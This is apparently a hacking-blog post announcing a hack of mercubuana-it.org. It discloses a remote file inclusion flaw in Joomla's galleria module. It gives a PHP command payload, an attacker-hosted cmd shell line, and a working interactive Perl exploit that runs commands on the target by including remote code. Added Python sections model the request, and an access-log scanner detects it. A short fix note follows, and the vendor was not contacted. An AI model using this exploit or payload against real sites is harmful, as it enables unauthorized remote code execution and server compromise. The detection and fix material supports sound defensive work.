LaGiPusHinGWitH ---- IT


Hacked mercubuana-it.org with (Joomla) Remote File Inclusion

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Joomla is free software written in PHP and released under the GNU GPL.

##########################################
# galleria - A Picture Gallery #
# Copyright (C) 2004 #
# Homepage : http://www.binarydigit.at #
# Email : office@binarydigit.at #
# Version : 1.0 #
# License : GNU GPL Public License #
##########################################

-------------------------------------------------------

The vulnerability is in the galleria module.

Proof of Concept:
~~~~~~~~~~~~~~~
Vulnerable script: galleria.php in the modules/galleria folder (the exploit below requests it at /components/com_galleria/galleria.php, the same component path the script's own include_once() lines use).

---------------galleria.php--------------------------------

// $mosConfig_absolute_path is never set here; it is expected to come from
// Joomla's configuration.php, but nothing checks that it does.
include_once($mosConfig_absolute_path."/components/com_galleria/galleria.html.php");
include_once($mosConfig_absolute_path."/components/com_galleria/config.galleria.php");
include_once($mosConfig_absolute_path."/administrator/components/com_galleria/class.galleria.php");

html_galleria::show_header( $option, $Itemid );

switch( $task )
{
case 'show_rubriks':
show_rubriks ( $option, $Itemid );
break;

...
---------------------------------------------------------

The variable $mosConfig_absolute_path is not sanitized: galleria.php uses it as the base path of its include_once() calls without defining it, and the snippet shows no check that the file was reached through Joomla's index.php (the usual defined('_VALID_MOS') guard), so it can be requested directly.
When register_globals=on, a request such as galleria.php?mosConfig_absolute_path=http://attacker/ turns that query parameter into the variable, and when allow_url_fopen=on, include_once() fetches PHP from the attacker's URL and executes it on the server (remote file inclusion).

Poc/Exploit:
~~~~~~~~~~~

dir.txt
<?php
// Included by the target through $mosConfig_absolute_path; runs in the target's process.
passthru('ls -la; id');
?>

Perl Exploit:
~~~~~~~~~~~

#!/usr/bin/perl
##
# Joomla Remote Code Execution Exploit
# Bug Found & code By roninmorgue
# code reference from K-159 & uid0/zod at ExploiterCode.com
##
# usage:
# perl joomla.pl <target> <cmd shell location> <cmd shell variable>
# perl joomla.pl http://target.com/ http://attacker.com/cmd.txt cmd
# cmd shell example: <?passthru($_GET[cmd]);?>
# cmd shell variable: cmd (the key the shell reads from $_GET)
##
# Contact: roninmorgue@yahoo.co.id || http://www.forum.mercubuana-it.org
##

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape qw(uri_escape);

my $Directory        = $ARGV[0];   # base URL of the Joomla site
my $DirectoryCommand = $ARGV[1];   # URL of the attacker-hosted PHP cmd shell
my $command          = $ARGV[2];   # GET variable the cmd shell reads

usage() if !$Directory || !$DirectoryCommand || !$command
        || $Directory !~ m{^http://} || $DirectoryCommand !~ m{^http://};

$Directory =~ s{/+$}{};            # avoid a double slash before /components/

head();

my $exploit = LWP::UserAgent->new() or die "Could not create user agent\n";

while (1) {
    print "[shell] \$";
    my $cmdshell = <STDIN>;
    last unless defined $cmdshell;  # EOF
    chomp($cmdshell);

    if ($cmdshell eq '') {
        print "\nPlease Enter a Command\n\n";
        next;
    }

    # The '?' ends the injected path so galleria.php's appended
    # "/components/com_galleria/galleria.html.php" becomes a harmless query
    # string on the attacker's server. The '&'.$command.'=' part is a separate
    # parameter of the TARGET request: the fetched PHP runs inside the target,
    # so $_GET[$command] is read there. The command is escaped so characters
    # like '#', ';' and spaces survive the URL.
    my $url = $Directory
            . '/components/com_galleria/galleria.php?mosConfig_absolute_path='
            . $DirectoryCommand . '?&' . $command . '=' . uri_escape($cmdshell);

    my $req    = HTTP::Request->new(GET => $url) or die "\nCould Not connect\n";
    my $res    = $exploit->request($req);
    my $return = $res->content;

    if ($return =~ /failed to open stream: HTTP request failed!/
        || $return =~ /: Cannot execute a blank command in <b>/) {
        print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";
        exit;
    }
    elsif ($return =~ /^<br.\>.<b>Fatal.error/) {
        print "\nInvalid Command or No Return\n\n";
        next;
    }

    print "\r\n$return\n\r";
}

sub head {
    print "\n===================================================\r\n";
    print " *Joomla Remote File Inclusion*\r\n";
    print "=====================================================\r\n";
}

sub usage {
    head();
    print " Usage: perl joomla.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
    print " <Site> - Full path to Joomla site ex: http://www.site.com/ \r\n";
    print " <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
    print " <cmd variable> - Command variable used in php shell \r\n";
    print "=====================================================\r\n";
    print " Bug Found by roninmorgue \r\n";
    print " Contact: roninmorgue@yahoo.co.id || http://www.forum.mercubuana-it.org \r\n";
    print "=====================================================\r\n";
    exit();
}
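The request the Perl exploit above builds is easy to get wrong, because two different servers parse pieces of it. The added example below (not part of the original post or of Joomla) models that request and what the target's PHP does with it: which parameters the target sees, which file include_once() really fetches once the hard-coded suffix is appended, and where passthru() gets its command from. The host names target.example and attacker.example are placeholders.

```python
from urllib.parse import urlsplit, parse_qs, quote

# Suffix galleria.php appends to $mosConfig_absolute_path in its first include_once().
INCLUDE_SUFFIX = "/components/com_galleria/galleria.html.php"


def exploit_request(target, shell_url, var, cmd):
    """URL the Perl script requests, built the same way as its HTTP::Request line.

    Only the command itself is percent-encoded; the '?&' after the shell URL is
    deliberate (see target_get_params and include_target).
    """
    return (target.rstrip("/")
            + "/components/com_galleria/galleria.php?mosConfig_absolute_path="
            + shell_url + "?&" + var + "=" + quote(cmd, safe=""))


def target_get_params(url):
    """$_GET as the target's PHP parses it (register_globals then makes every key a variable).

    The '&' before var= makes the command a separate parameter of the TARGET
    request, so $mosConfig_absolute_path ends at the '?' and the command itself
    is never sent to the attacker's server at all.
    """
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def include_target(get_params):
    """File include_once() really fetches: the injected URL plus the hard-coded suffix.

    Because the injected value ends in '?', the suffix turns into a query string
    on the attacker's web server, which ignores it and serves cmd.txt unchanged.
    """
    return get_params["mosConfig_absolute_path"] + INCLUDE_SUFFIX


def command_executed(url, var):
    """Value passthru($_GET[var]) receives.

    The fetched PHP source executes inside the target's request, so $_GET there
    is the target request's query string; the command is read from it.
    """
    return target_get_params(url).get(var)


if __name__ == "__main__":
    u = exploit_request("http://target.example/", "http://attacker.example/cmd.txt",
                        "cmd", "ls -la; id")
    print("target request :", u)
    print("include fetches:", include_target(target_get_params(u)))
    print("command run    :", command_executed(u, "cmd"))
```

This is also why the exploit's "Cannot execute a blank command" check exists: if the command ends up on the wrong side of the '?', the included shell runs passthru('') on the target.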

---------------------------------------------------------
Solution/The Fix:
~~~~~~~~~~~~~~

Disable or delete the galleria module until it is fixed.
Fix galleria.php so that $mosConfig_absolute_path cannot come from the request: add Joomla's defined('_VALID_MOS') or die(...) guard at the top so the file cannot be requested directly, and take the path only from configuration.php. Turning off register_globals, and allow_url_fopen (or allow_url_include on PHP 5.2 and later), in php.ini closes this vector for every script on the host, not just this one.
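Sites that run this module will also want to know whether the exploit has already been used against them. The following is an added example, not from the original post, that scans Apache combined-format access-log lines for requests injecting a remote URL into any query parameter (single- or double-encoded), which is the signature of the request the Perl script sends. The log lines are constructed for the example; the IP addresses are documentation ranges and the libwww-perl User-Agent is what LWP::UserAgent sends by default.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined log: ip ident user [time] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_SCHEME = re.compile(r'^(https?|ftps?)://', re.IGNORECASE)

# Constructed sample lines (not from any real server). Lines 1 and 3 mimic the Perl
# exploit; line 2 is a normal visit to the component through index.php.
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Aug/2006:20:42:01 +0700] "GET /components/com_galleria/galleria.php'
    '?mosConfig_absolute_path=http://203.0.113.9/cmd.txt?&cmd=id HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '192.0.2.15 - - [22/Aug/2006:20:43:10 +0700] "GET /index.php?option=com_galleria&Itemid=27 HTTP/1.1"'
    ' 200 8123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Aug/2006:20:44:31 +0700] "GET /components/com_galleria/galleria.php'
    '?mosConfig_absolute_path=http%3A%2F%2F203.0.113.9%2Fcmd.txt%3F&cmd=uname%20-a HTTP/1.1"'
    ' 200 330 "-" "libwww-perl/5.805"',
]


def rfi_params(target):
    """Query parameters of a request target whose decoded value is a remote URL."""
    hits = {}
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            value = unquote(value)  # parse_qs decoded once; this catches %25-double-encoded payloads
            if REMOTE_SCHEME.match(value):
                hits[name] = value
    return hits


def scan_access_log(lines):
    """One finding per request that injects a remote URL into any query parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined-log format; skip rather than guess
        hits = rfi_params(m["target"])
        if not hits:
            continue
        findings.append({
            "ip": m["ip"],
            "time": m["ts"],
            "path": urlsplit(m["target"]).path,
            "status": int(m["status"]),
            "params": hits,          # parameter name -> injected remote URL
            "user_agent": m["ua"],
        })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["path"], f["params"], f["user_agent"])
```

Matching on any parameter rather than on mosConfig_absolute_path alone also catches the same technique aimed at other unguarded Joomla/Mambo scripts. A hit with status 200 means PHP served a page, not necessarily that the include succeeded (with allow_url_fopen off it fails with a warning), so pull the injected URL's contents and check the server for dropped files before deciding.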

Notification:
~~~~~~~~~~~

The vendor has not been contacted.

Posted by roninmorgue on 08/22 at 08:42 PM
Category: Computer Hacking
